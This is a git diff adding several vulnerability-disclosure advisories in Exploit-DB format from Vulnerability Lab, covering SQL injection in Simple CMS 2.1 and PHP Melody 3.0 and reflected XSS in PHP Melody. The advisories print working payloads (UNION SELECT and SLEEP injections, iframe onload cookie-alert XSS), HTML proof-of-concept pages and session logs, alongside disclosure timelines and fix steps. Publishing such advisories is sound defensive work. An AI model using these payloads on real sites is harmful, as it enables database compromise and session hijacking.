+content-length: 196
+content-type: text/html; charset=iso-8859-1
+
+
+
+Reference(s):
+https://simple-cms.localhost:8000/simplecms/admin.php
+https://simple-cms.localhost:8000/simplecms/admin.php
+https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/php/webapps/50483.txt b/exploits/php/webapps/50483.txt
new file mode 100644
index 000000000..42b9a1c74
--- /dev/null
+++ b/exploits/php/webapps/50483.txt
@@ -0,0 +1,225 @@
+# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
+# Date: 2021-10-19
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
+# Version: 2.1
+# Tested on: Linux
+
+Document Title:
+===============
+Simplephpscripts Simple CMS v2.1 - SQL Injection
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2303
+
+
+Release Date:
+=============
+2021-10-19
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2303
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Vulnerability Class:
+====================
+SQL Injection
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+The system could be used only in already existing websites to control their page sections and contents.
+Just paste a single line of code on your web page section and start controlling it through the admin area.
+Very simple installation - one step installation wizard. Option to include contents into web page sections
+through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
+format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
+
+(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
+
+
+Affected Product(s):
+====================
+Simplephpscripts
+Product: Simple CMS v2.1 - Content Management System (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-09-03: Researcher Notification & Coordination (Security Researcher)
+2021-09-04: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-10-19: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted Authentication (Moderator Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A remote sql-injection vulnerability has been discovered in the official creative zone web-application.
+The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms
+or file system of the application.
+
+The sql-injection web vulnerability is located in the `newUser` and `editUser` function of the `users` module in
+the `admin.php` file. Remote attackers with privileged access to the panel are able to add users. If a user account
+already exists like for example the admin account, each add of the same name or email values results in a unfiltered
+mysql exception. The exception is not filtered and sanitized. Thus allows privileged attackers to inject and execute
+own sql commands on the affected database management system to compromise. The request method to inject is post and
+the attack vector is non-persistent.
+
+Exploitation of the sql injection vulnerability requires user interaction and a privileged web-application user account.
+Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] newUser
+[+] editUser
+
+Vulnerable File(s):
+[+] admin.php?act=users
+
+Vulnerable Input(s):
+[+] Name
+[+] Username
+[+] Password
+
+Vulnerable Parameter(s):
+[+] name
+[+] username
+[+] password
+
+Affected Module(s):
+[+] Users (act=users) (Backend)
+
+
+Proof of Concept (PoC):
+=======================
+The remote sql-injection web vulnerability can be exploited by remote attackers with privileged account and without user interaction.
+For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Example
+act=addUser&name=[ADD EXISITING DEFAULT VALUE!]&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE!]&password=[ADD EXISITING DEFAULT VALUE!]&submit=Add User
+
+
+PoC: Exploitation
+act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User
+
+
+--- PoC Session Logs (POST) ---
+https://simple-cms.localhost:8000/simplecms/admin.php
+Host: simple-cms.localhost:8000
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 132
+Origin: https://simple-cms.localhost:8000
+Connection: keep-alive
+Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
+act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&submit=Add User
+-
+POST: HTTP/2.0 200 OK
+server: Apache
+content-length: 1224
+content-type: text/html; charset=UTF-8
+
+
+--- SQL Error Exception Logs ---
+Error: SELECT * FROM cms2_users WHERE username='a%20-1'
+Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%20-1'' at line 1
+
+
+Solution - Fix & Patch:
+=======================
+1. Disallow sql-errors to be displayed in the frontend and backend. Disable to redisplay the broken or malicious query on client-side.
+2. Use prepared statement to protect the sql query of the post method request
+3. Restrict the post parameters by disallow the usage of special chars with single or double quotes
+4. Setup a filter or validation class to deny broken or manipulated sql queries
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/php/webapps/50486.txt b/exploits/php/webapps/50486.txt
new file mode 100644
index 000000000..f52a8f34c
--- /dev/null
+++ b/exploits/php/webapps/50486.txt
@@ -0,0 +1,282 @@
+# Exploit Title: PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
+# Date: 2021-10-20
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
+# Version: v3
+# Tested on: Linux
+
+Document Title:
+===============
+PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2290
+
+Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
+
+
+Release Date:
+=============
+2021-10-20
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2290
+
+
+Common Vulnerability Scoring System:
+====================================
+5
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Non Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
+Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
+TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
+
+(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 video cms web-application.
+
+
+Affected Product(s):
+====================
+PHPSUGAR
+Product: PHP Melody v3.0 - Video CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-09-01: Researcher Notification & Coordination (Security Researcher)
+2021-09-02: Vendor Notification (Security Department)
+2021-09-04: Vendor Response/Feedback (Security Department)
+2021-09-22: Vendor Fix/Patch (Service Developer Team)
+2021-09-22: Security Acknowledgements (Security Department)
+2021-10-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+Multiple non-persistent cross site web vulnerabilities has been discovered in the official PHP Melody v3.0 video cms web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser
+to web-application requests by the client-side.
+
+The cross site scripting vulnerabilities are located in the `moved`, `username` and `keyword` parameters of the `categories.php`, `import.php`
+or `import-user.php` files. The injection point is located in the get method request and the execution occurs with non-persistent attack vector
+in the status message or exception of the admin panel ui.
+
+Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
+to malicious source and non-persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] GET
+
+Vulnerable File(s):
+[+] categories.php
+[+] import-user.php
+[+] import.php
+
+Vulnerable Parameter(s):
+[+] move
+[+] username
+[+] keyword
+
+Affected Module(s):
+[+] Status Message & Exception
+
+
+Proof of Concept (PoC):
+=======================
+The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.
+For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Payload
+%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
+
+
+PoC: Exploitation
+https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
+-
+https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
+&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
+-
+https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>PHP Melody v3.0 - XSS PoC Exploit</title>
+#1
+<iframe src="https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E" width="200" height="200"> </iframe>
+#2
+<iframe src="https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">
+&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1 </iframe>
+#3
+<iframe src="https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4 </iframe>
+</body></head>
+</html>
+
+
+--- PoC Session Logs (GET) (move) ---
+https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved="><iframe src=evil.source onload=alert(document.cookie)>
+Host: phpmelody.localhost.com:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
+melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
+cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
+pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
+-
+GET: HTTP/2.0 200 OK
+content-type: text/html; charset=utf-8
+x-powered-by: PHP/5.4.34
+
+
+--- PoC Session Logs (GET) (username) ---
+https://phpmelody.localhost:8080/admin/import-user.php?action=search&username="><iframe src=evil.source onload=alert(document.cookie)>&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
+Host: phpmelody.localhost:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
+melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
+cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
+pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
+-
+GET: HTTP/2.0 200 OK
+content-type: text/html; charset=utf-8
+x-powered-by: PHP/5.4.34
+
+
+Vulnerable Source: Categories.php (type=genre&id=1&moved)
+<div class="alert alert-success alert-styled-left"><button type="button" class="close" data-dismiss="alert"
+aria-label="Close"><span aria-hidden="true">×</span></button>
+Category<strong>Film & animation</strong> moved "><iframe src="evil.source" onload="alert(document.cookie)"> a level.</div>
+<div id="display_result" style="display:none;"></div>
+
+
+Vulnerable Source: Import Videos from User (action=search&username)
+<div class="card">
+<div class="card-body">
+<h5 class="mb-3">Username</h5>
+<div class="d-block">
+<form name="import-user-search-form" id="import-user-search-form" action="" method="post" class="">
+<div class="input-group mb-3">
+<div class="form-group-feedback form-group-feedback-left">
+<input name="username" type="text" class="form-control form-control-lg alpha-grey gautocomplete" value=""><iframe src="evil.source" onload="alert(document.cookie)">"
+placeholder="Enter username or Channel ID" autocomplete="yt-username" />
+<div class="form-control-feedback form-control-feedback-lg">
+<i class="icon-search4 text-muted"></i>
+</div></div>
+<div class="input-group-append">
+<select name="data_source" class="form-field alpha-grey custom-select custom-select-lg">
+<option value="youtube" selected="selected">Youtube User</option>
+<option value="youtube-channel" >Youtube Channel</option>
+<option value="dailymotion" >Dailymotion User</option>
+<option value="vimeo" >Vimeo User</option>
+</select></div>
+<div class="input-group-append">
+<button type="submit" name="submit" class="btn btn-primary btn-lg" id="search-user-btn">Search</button>
+</div></div>
+
+
+Reference(s):
+https://phpmelody.localhost.com:8080/admin/
+https://phpmelody.localhost.com:8080/admin/import.php
+https://phpmelody.localhost.com:8080/admin/categories.php
+https://phpmelody.localhost.com:8080/admin/import-user.php
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerabilities can be resolved by the following steps ...
+1. Encode, escape or filter the vulnerable move, keyword and username parameters in the get method requests
+2. Restrict all the transmitted parameters by disallowing the usage of special chars
+3. Sanitize the status message and error message output to prevent the execution points
+4. Alternativ setup security headers and a web firewall or filter to prevent further exploitation
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/php/webapps/50487.txt b/exploits/php/webapps/50487.txt
new file mode 100644
index 000000000..1fbc34179
--- /dev/null
+++ b/exploits/php/webapps/50487.txt
@@ -0,0 +1,214 @@
+# Exploit Title: PHP Melody 3.0 - 'vid' SQL Injection
+# Date: 2021-10-20
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
+# Version: v3
+
+Document Title:
+===============
+PHP Melody v3.0 - (vid) SQL Injection Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2295
+
+Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
+
+
+Release Date:
+=============
+2021-10-20
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2295
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Vulnerability Class:
+====================
+SQL Injection
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
+Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
+TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
+
+(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the PHP Melody v3.0 video cms web-application.
+
+
+Affected Product(s):
+====================
+PHPSUGAR
+Product: PHP Melody v3.0 - Video CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-09-01: Researcher Notification & Coordination (Security Researcher)
+2021-09-02: Vendor Notification (Security Department)
+2021-09-04: Vendor Response/Feedback (Security Department)
+2021-09-22: Vendor Fix/Patch (Service Developer Team)
+2021-09-22: Security Acknowledgements (Security Department)
+2021-10-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Full Authentication (Admin/Root Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A remote sql-injection vulnerability has been discovered  in the PHP Melody v3.0 video cms web-application.
+The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or
+file system of the web-application.
+
+The remote sql injection vulnerability is located in the `vid` parameter of the `edit-video.php` file.
+Remote attackers with moderator or admin access privileges are able to execute own malicious sql commands
+by inject get method request. The vid parameter in the acp ui is not sanitized properly. Thus allows an
+attacker to inject own sql commands to compromise the web-application and dbms.
+
+Exploitation of the remote sql injection vulnerability requires no user interaction but a privileged moderator or admin account.
+Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] Video Edit
+
+Vulnerable File(s):
+[+] edit-video.php
+
+Vulnerable Parameter(s):
+[+] vid
+
+
+Proof of Concept (PoC):
+=======================
+The remote sql-injection web vulnerability can be exploited by authenticated remote attackers without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Original:
+https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc
+
+
+PoC: Exploitation #1
+https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
+CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
+
+
+PoC: Exploitation #2
+https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>phpmelody vid sql injection poc</title>
+<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
+CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--">
+<br>
+<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--">
+</body></head>
+</html>
+
+
+Reference(s):
+https://phpmelody.localhost:8000/
+https://phpmelody.localhost:8000/admin/
+https://phpmelody.localhost:8000/admin/edit-video.php
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be resolved by the following steps ...
+1. Use a prepared statement to build the query
+2. Restrict the parameter input to disallow special chars
+3. Escape and encode the content to prevent execution of malicious payloads
+4. Alternativ it is possible to integrate a web firewall or filter class to block further attacks.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/php/webapps/50488.txt b/exploits/php/webapps/50488.txt
new file mode 100644
index 000000000..ea6ce6378
--- /dev/null
+++ b/exploits/php/webapps/50488.txt
@@ -0,0 +1,214 @@
+# Exploit Title: PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
+# Date: 2021-10-21
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
+
+Document Title:
+===============
+PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2291
+
+Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
+
+
+Release Date:
+=============
+2021-10-21
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2291
+
+
+Common Vulnerability Scoring System:
+====================================
+5.4
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
+Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
+TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
+
+(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
+
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the PHP Melody v3.0 video cms web-application.
+
+
+Affected Product(s):
+====================
+PHPSUGAR
+Product: PHP Melody v3.0 - Video CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-09-01: Researcher Notification & Coordination (Security Researcher)
+2021-09-02: Vendor Notification (Security Department)
+2021-09-04: Vendor Response/Feedback (Security Department)
+2021-09-22: Vendor Fix/Patch (Service Developer Team)
+2021-09-22: Security Acknowledgements (Security Department)
+2021-10-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Moderator Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
